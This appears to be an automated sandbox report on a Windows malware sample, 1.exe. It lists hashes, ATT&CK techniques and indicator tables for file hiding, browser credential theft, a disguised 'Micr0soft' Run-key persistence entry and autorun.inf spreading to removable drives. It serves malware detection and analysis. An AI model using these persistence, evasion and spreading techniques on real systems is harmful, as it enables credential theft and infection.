280268db673f66dc31e54d86de101cf8b5d52c583a9282d9c7ccb4475612a8e0

Analysis

max time kernel
150s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
20-11-2024 13:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1.exe
Size

104KB
MD5

5e488441d160b82bdf55b0547f8cb28f
SHA1

f3dc1a56e21b25849e97d32be01afa8e8e0b6269
SHA256

39f3c5f6717bd58b4bd299d6b0ea2eac3c2b62eaa1207b1c15d3e3d09589d6d2
SHA512

85fe28c8b1cbeca5805c305fab96d6eb03bade72e82fe23ddbe7e89b1d29315bb0ded0f1adc41c1c8cfd8e8b888ed1ab03d77cb571912695389d3c064e4dc713
SSDEEP

1536:/e8f5p+nyS3pPEnFZ60oYJjEiVf5ppW0S3pPpnW:28Wny4p2TpjEiVRW04p5W

Score

8^/10

discovery evasion persistence spyware stealer upx

Malware Config

Signatures

Disables Task Manager via registry modification
evasion

Sets file to hidden 1 TTPs 64 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid	process
3040	attrib.exe
4464
2908
3904
1216	attrib.exe
5020	attrib.exe
5044	attrib.exe
1644
3728
1796	attrib.exe
2584	attrib.exe
4988
4208	attrib.exe
1744	attrib.exe
3000	attrib.exe
3020	attrib.exe
5108	attrib.exe
1552	attrib.exe
1600	attrib.exe
4832
2532	attrib.exe
1056	attrib.exe
4008	attrib.exe
444	attrib.exe
5020
4172
4644
1808
3148	attrib.exe
4628	attrib.exe
1052	attrib.exe
3992
4392
3244
3676	attrib.exe
684	attrib.exe
1188	attrib.exe
4112
2548
1500
5096	attrib.exe
3624	attrib.exe
836
1688
4036	attrib.exe
684	attrib.exe
4652	attrib.exe
4540	attrib.exe
1492	attrib.exe
712	attrib.exe
3300
1744
3560	attrib.exe
1780	attrib.exe
4852	attrib.exe
684	attrib.exe
2516	attrib.exe
1356
2388
3868
3696	attrib.exe
4356	attrib.exe
4572	attrib.exe
1468

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Micr0soft = "C:\\WINDOWS\\system32\\foto.exe"	reg.exe

Drops autorun.inf file 1 TTPs 64 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

Processes:

description	ioc	process
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf
File opened for modification	F:\autorun.inf	attrib.exe
File opened for modification	F:\autorun.inf	attrib.exe

Drops file in System32 directory 2 IoCs

Processes:

1.exeattrib.exe

description	ioc	process
File created	C:\Windows\SysWOW64\windows_update.bat	1.exe
File opened for modification	C:\Windows\SysWOW64\windows_update.bat	attrib.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral10/memory/4912-0-0x0000000000400000-0x000000000041C000-memory.dmp	upx
behavioral10/memory/4912-11-0x0000000000400000-0x000000000041C000-memory.dmp	upx

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

xcopy.exexcopy.exexcopy.exeattrib.exexcopy.exeattrib.exeattrib.exetaskkill.exexcopy.exetaskkill.exetaskkill.exexcopy.exeattrib.exexcopy.exeattrib.exeattrib.exexcopy.exexcopy.exetaskkill.exexcopy.exeattrib.exetaskkill.exexcopy.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exexcopy.exexcopy.exexcopy.exetaskkill.exeattrib.exexcopy.exexcopy.exeattrib.exexcopy.exeattrib.exetaskkill.exetaskkill.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language

Enumerates system info in registry 2 TTPs 64 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

xcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exexcopy.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier

Kills process with taskkill 64 IoCs

evasion

Processes:

pid	process
1512
4464	taskkill.exe
2080	taskkill.exe
772	taskkill.exe
4692
3772
3236
948
2248
224
640
4528	taskkill.exe
4528	taskkill.exe
3204	taskkill.exe
1396
2264
3732
2808
4868	taskkill.exe
3472	taskkill.exe
228	taskkill.exe
880	taskkill.exe
4948	taskkill.exe
3300	taskkill.exe
3748	taskkill.exe
4476
3236	taskkill.exe
4500	taskkill.exe
4860
2332
4068
1620
3768	taskkill.exe
832	taskkill.exe
228	taskkill.exe
4644
1660
2356
3000
5092	taskkill.exe
832	taskkill.exe
4336	taskkill.exe
5068	taskkill.exe
1616	taskkill.exe
2184	taskkill.exe
4204	taskkill.exe
1620	taskkill.exe
832	taskkill.exe
2708
2976
2948	taskkill.exe
360	taskkill.exe
2112	taskkill.exe
1056	taskkill.exe
4392	taskkill.exe
4040	taskkill.exe
4036
2872
444
3604
2076	taskkill.exe
2284	taskkill.exe
1504	taskkill.exe
2012	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1284 reg.exe

pid	process
1284	reg.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	2076	taskkill.exe
Token: SeDebugPrivilege	3124	taskkill.exe
Token: SeDebugPrivilege	4172	taskkill.exe
Token: SeDebugPrivilege	2284	taskkill.exe
Token: SeDebugPrivilege	116	taskkill.exe
Token: SeDebugPrivilege	3948	taskkill.exe
Token: SeDebugPrivilege	880	taskkill.exe
Token: SeDebugPrivilege	3604	taskkill.exe
Token: SeDebugPrivilege	5044	taskkill.exe
Token: SeDebugPrivilege	832	taskkill.exe
Token: SeDebugPrivilege	2528	taskkill.exe
Token: SeDebugPrivilege	2712	taskkill.exe
Token: SeDebugPrivilege	4336	taskkill.exe
Token: SeDebugPrivilege	3516	taskkill.exe
Token: SeDebugPrivilege	4652	taskkill.exe
Token: SeDebugPrivilege	3228	taskkill.exe
Token: SeDebugPrivilege	1504	taskkill.exe
Token: SeDebugPrivilege	3584	taskkill.exe
Token: SeDebugPrivilege	2080	taskkill.exe
Token: SeDebugPrivilege	1056	taskkill.exe
Token: SeDebugPrivilege	4528	taskkill.exe
Token: SeDebugPrivilege	3448	taskkill.exe
Token: SeDebugPrivilege	2948	taskkill.exe
Token: SeDebugPrivilege	4576	taskkill.exe
Token: SeDebugPrivilege	1116	taskkill.exe
Token: SeDebugPrivilege	5028	taskkill.exe
Token: SeDebugPrivilege	772	taskkill.exe
Token: SeDebugPrivilege	3700	taskkill.exe
Token: SeDebugPrivilege	224	taskkill.exe
Token: SeDebugPrivilege	4328	taskkill.exe
Token: SeDebugPrivilege	2252	taskkill.exe
Token: SeDebugPrivilege	4400	taskkill.exe
Token: SeDebugPrivilege	508	taskkill.exe
Token: SeDebugPrivilege	228	taskkill.exe
Token: SeDebugPrivilege	2596	taskkill.exe
Token: SeDebugPrivilege	4780	taskkill.exe
Token: SeDebugPrivilege	3984	taskkill.exe
Token: SeDebugPrivilege	2072	taskkill.exe
Token: SeDebugPrivilege	3300	taskkill.exe
Token: SeDebugPrivilege	3200	taskkill.exe
Token: SeDebugPrivilege	4868	taskkill.exe
Token: SeDebugPrivilege	5052	taskkill.exe
Token: SeDebugPrivilege	3604	taskkill.exe
Token: SeDebugPrivilege	4956	taskkill.exe
Token: SeDebugPrivilege	3980	taskkill.exe
Token: SeDebugPrivilege	1324	taskkill.exe
Token: SeDebugPrivilege	3676	taskkill.exe
Token: SeDebugPrivilege	3212	taskkill.exe
Token: SeDebugPrivilege	1396	taskkill.exe
Token: SeDebugPrivilege	1876	taskkill.exe
Token: SeDebugPrivilege	1332	taskkill.exe
Token: SeDebugPrivilege	4880	taskkill.exe
Token: SeDebugPrivilege	3124	taskkill.exe
Token: SeDebugPrivilege	4052	taskkill.exe
Token: SeDebugPrivilege	2284	taskkill.exe
Token: SeDebugPrivilege	1516	taskkill.exe
Token: SeDebugPrivilege	4548	taskkill.exe
Token: SeDebugPrivilege	4528	taskkill.exe
Token: SeDebugPrivilege	4464	taskkill.exe
Token: SeDebugPrivilege	2948	taskkill.exe
Token: SeDebugPrivilege	5052	taskkill.exe
Token: SeDebugPrivilege	3604	taskkill.exe
Token: SeDebugPrivilege	4492	taskkill.exe
Token: SeDebugPrivilege	1312	taskkill.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

1.exe

pid process

4912 1.exe

pid	process
4912	1.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

1.exeCMD.EXE

description	pid	process	target process
PID 4912 wrote to memory of 3708	4912	1.exe	CMD.EXE
PID 4912 wrote to memory of 3708	4912	1.exe	CMD.EXE
PID 4912 wrote to memory of 3708	4912	1.exe	CMD.EXE
PID 3708 wrote to memory of 1284	3708	CMD.EXE	reg.exe
PID 3708 wrote to memory of 1284	3708	CMD.EXE	reg.exe
PID 3708 wrote to memory of 1284	3708	CMD.EXE	reg.exe
PID 3708 wrote to memory of 2296	3708	CMD.EXE	reg.exe
PID 3708 wrote to memory of 2296	3708	CMD.EXE	reg.exe
PID 3708 wrote to memory of 2296	3708	CMD.EXE	reg.exe
PID 3708 wrote to memory of 1252	3708	CMD.EXE	reg.exe
PID 3708 wrote to memory of 1252	3708	CMD.EXE	reg.exe
PID 3708 wrote to memory of 1252	3708	CMD.EXE	reg.exe
PID 3708 wrote to memory of 3632	3708	CMD.EXE	reg.exe
PID 3708 wrote to memory of 3632	3708	CMD.EXE	reg.exe
PID 3708 wrote to memory of 3632	3708	CMD.EXE	reg.exe
PID 3708 wrote to memory of 1396	3708	CMD.EXE	attrib.exe
PID 3708 wrote to memory of 1396	3708	CMD.EXE	attrib.exe
PID 3708 wrote to memory of 1396	3708	CMD.EXE	attrib.exe
PID 3708 wrote to memory of 3512	3708	CMD.EXE	attrib.exe
PID 3708 wrote to memory of 3512	3708	CMD.EXE	attrib.exe
PID 3708 wrote to memory of 3512	3708	CMD.EXE	attrib.exe
PID 3708 wrote to memory of 2252	3708	CMD.EXE	attrib.exe
PID 3708 wrote to memory of 2252	3708	CMD.EXE	attrib.exe
PID 3708 wrote to memory of 2252	3708	CMD.EXE	attrib.exe
PID 3708 wrote to memory of 4260	3708	CMD.EXE	attrib.exe
PID 3708 wrote to memory of 4260	3708	CMD.EXE	attrib.exe
PID 3708 wrote to memory of 4260	3708	CMD.EXE	attrib.exe
PID 3708 wrote to memory of 2076	3708	CMD.EXE	taskkill.exe
PID 3708 wrote to memory of 2076	3708	CMD.EXE	taskkill.exe
PID 3708 wrote to memory of 2076	3708	CMD.EXE	taskkill.exe
PID 3708 wrote to memory of 1652	3708	CMD.EXE	xcopy.exe
PID 3708 wrote to memory of 1652	3708	CMD.EXE	xcopy.exe
PID 3708 wrote to memory of 1652	3708	CMD.EXE	xcopy.exe
PID 3708 wrote to memory of 1392	3708	CMD.EXE	xcopy.exe
PID 3708 wrote to memory of 1392	3708	CMD.EXE	xcopy.exe
PID 3708 wrote to memory of 1392	3708	CMD.EXE	xcopy.exe
PID 3708 wrote to memory of 2532	3708	CMD.EXE	attrib.exe
PID 3708 wrote to memory of 2532	3708	CMD.EXE	attrib.exe
PID 3708 wrote to memory of 2532	3708	CMD.EXE	attrib.exe
PID 3708 wrote to memory of 3124	3708	CMD.EXE	taskkill.exe
PID 3708 wrote to memory of 3124	3708	CMD.EXE	taskkill.exe
PID 3708 wrote to memory of 3124	3708	CMD.EXE	taskkill.exe
PID 3708 wrote to memory of 3424	3708	CMD.EXE	xcopy.exe
PID 3708 wrote to memory of 3424	3708	CMD.EXE	xcopy.exe
PID 3708 wrote to memory of 3424	3708	CMD.EXE	xcopy.exe
PID 3708 wrote to memory of 2596	3708	CMD.EXE	xcopy.exe
PID 3708 wrote to memory of 2596	3708	CMD.EXE	xcopy.exe
PID 3708 wrote to memory of 2596	3708	CMD.EXE	xcopy.exe
PID 3708 wrote to memory of 1216	3708	CMD.EXE	attrib.exe
PID 3708 wrote to memory of 1216	3708	CMD.EXE	attrib.exe
PID 3708 wrote to memory of 1216	3708	CMD.EXE	attrib.exe
PID 3708 wrote to memory of 4172	3708	CMD.EXE	taskkill.exe
PID 3708 wrote to memory of 4172	3708	CMD.EXE	taskkill.exe
PID 3708 wrote to memory of 4172	3708	CMD.EXE	taskkill.exe
PID 3708 wrote to memory of 4056	3708	CMD.EXE	xcopy.exe
PID 3708 wrote to memory of 4056	3708	CMD.EXE	xcopy.exe
PID 3708 wrote to memory of 4056	3708	CMD.EXE	xcopy.exe
PID 3708 wrote to memory of 2568	3708	CMD.EXE	xcopy.exe
PID 3708 wrote to memory of 2568	3708	CMD.EXE	xcopy.exe
PID 3708 wrote to memory of 2568	3708	CMD.EXE	xcopy.exe
